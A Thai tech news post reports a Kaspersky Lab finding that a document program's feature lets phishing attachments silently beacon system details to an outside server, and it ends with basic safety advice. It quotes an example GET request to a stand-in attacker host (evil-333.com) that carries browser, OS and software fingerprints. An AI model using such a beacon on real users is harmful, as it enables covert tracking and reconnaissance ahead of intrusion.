Kaspersky Lab ค้นพบช่องทางขโมยข้อมูลแบบใหม่ ในฟีเจอร์ของโปรแกรมพิมพ์เอกสารยอดนิยม ที่สามารถนำมาใช้ดักจับข้อมูลต่างๆ ไม่ว่าจะเป็น ข้อมูลเบราว์เซอร์ ข้อมูลเวอร์ชั่นของระบบปฏิบัติการ ข้อมูลซอฟต์แวร์ หรืออุปกรณ์ที่เปิดไฟล์ ทั้งบนคอมพิวเตอร์พีซี และมือถือสมาร์ทโฟน ได้แบบชนิดที่เรียกว่า "แนบเนียนสุดๆ"
สิ่งที่จะทำให้ช่องโหว่นี้ทำงานก็คือ ไฟล์เอกสารที่แนบมาใน ฟิชชิงอีเมล (อีเมลที่หลอกให้คนกดเข้าไปอ่าน) หากผู้ใช้ "เปิดดูไฟล์" มันก็จะทำการส่งคำขอ GET Request ไปยังเว็บไซต์ภายนอกพร้อมกับข้อมูลต่างๆ โดยที่เราไม่รู้ตัว
*ตัวอย่างข้อมูลที่ถูกส่งไปยังเว็บไซต์ภายนอก
GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive
และข้อมูลที่ถูกส่งออกไปนั้น มีทั้งประเภทของเว็บเบราว์เซอร์ที่ใช้ (Browser) ข้อมูลเวอร์ชั่นระบบปฏิบัติการ (OS) ข้อมูลซอฟต์แวร์ต่างๆ ที่ติดตั้งในเครื่อง (Trident, SLCC, .NET ฯลฯ) รวมถึงโปรแกรมที่ใช้เปิดไฟล์นั้นอีกด้วย ถือว่าเป็นเรื่องที่อันตรายมากๆ หากข้อมูลเหล่านี้อยู่ในมือแฮกเกอร์ อาจส่งผลเสียร้ายแรง และไม่แน่ว่าอาจจะถูกเจาะเข้าระบบง่ายขึ้นก็ได้นะ โดยช่องโหว่นี้ทาง Kaspersky Lab ได้แจ้งให้ผู้มีส่วนเกี่ยวข้องทราบเรียบร้อยแล้ว แต่ยังไม่มีการตอบกลับมาแต่อย่างใด เราคงต้องรอติดตามข่าวกันอีกที
อย่างไรก็ตามผู้เขียนมีวิธีป้องกันตัวแบบง่ายที่ใครๆ ก็ทำได้มาแนะนำก็คือ หลีกเลี่ยงการดาวน์โหลดไฟล์ต่างๆ ที่เราไม่รู้แหล่งที่มา และถ้าจำเป็นต้องเปิดจริงๆ ให้นำชื่อของแหล่งที่มานั้น ไปเสิร์ชหาข้อมูลบนอินเทอร์เน็ตก่อน เมื่อเราคิดว่ามั่นใจแล้วจึงค่อยเปิดดู ซึ่งวิธีนี้ยังใช้ป้องกันมัลแวร์ต่างๆ ได้อีกด้วยนะ หวังว่าข้อมูลนี้จะมีประโยชน์ไม่มากก็น้อยแก่ผู้อ่านทุกคน
ที่มา – news.thaiware.com